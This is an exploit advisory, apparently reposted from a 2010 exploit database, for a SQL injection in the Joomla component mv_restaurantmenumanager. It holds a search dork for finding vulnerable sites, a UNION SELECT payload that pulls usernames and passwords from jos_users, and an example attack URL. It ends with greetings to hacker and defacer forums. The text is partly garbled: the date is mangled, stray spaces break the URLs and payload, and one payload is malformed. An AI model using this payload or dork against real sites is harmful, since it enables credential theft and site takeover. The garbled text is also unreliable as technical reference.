Test method:
The Program (method) provided on this site may be offensive and only used for security research and teaching. You are at your own risk! ========================================================== ========================
Joomla component mv_restaurantmenumanager SQL injection Vulnerability
========================================================== ========================
# Exploit Title: joomla component mv_restaurantmenumanager SQL injection Vulnerability
# Date: 12 then l 2010
# Author: Sudden_death (suddendeath404@yahoo.com)
# Software Link: N/
# Tested on: Windows XP 2
# Platform/Tested on: Windows XP 2 SP 2
# Category: webapps/0day
# Myweb: http://suddendeath.000space.com/
# Dork: inurl: option = com_mv_restaurantmenumanager
# Code: + and + 1 = 2 + union + select +, group_concat (username, 0x3a, password), 12 + from + jos_users
========================================================== ====================================
# EXPLOIT/c0de
+ And + 1 = 2 + union + select +, group_concat (username, 0x3a, password), 12 + from + jos_users
# VULN IN HERE
Http: // localhost/joomla/index. php? Option = com_mv_restaurantmenumanager & task = menu_display & Venue = 1 & mid = 5 [c0de
# EXAMPLE
Http: // localhost/joomla/index. php? Option = com_mv_restaurantmenumanager & task = menu_display & Venue = 1 & mid = 5 + and + 1 = 2 + union + select + 1, 2, group_concat (username, 0x3a, password), 4, 5, 6, 7, 8, 9, 10, 11, 12 + from + jos_users
[#] -------------------------------------------------------------------
Greetz to we forum:
[Indonesianhacker [dot] com | indonesiandefacer [dot] org]
[#] -------------------------------------------------------------------
My brotha:
| MISTERFRIBO | BobyPutrA | %3m_rto | bumble_be | CS-31 | d43ngCyb3r | Ichito-Bandito | james0baster |
| KaMtiEz | Man In Black | otong | r3m1cks | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds |
| Cah_surip | demnas | RXn7 | and all crew indonesia hacker: D |
[#] -------------------------------------------------------------------
Note: jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap apa yang kau katakan! //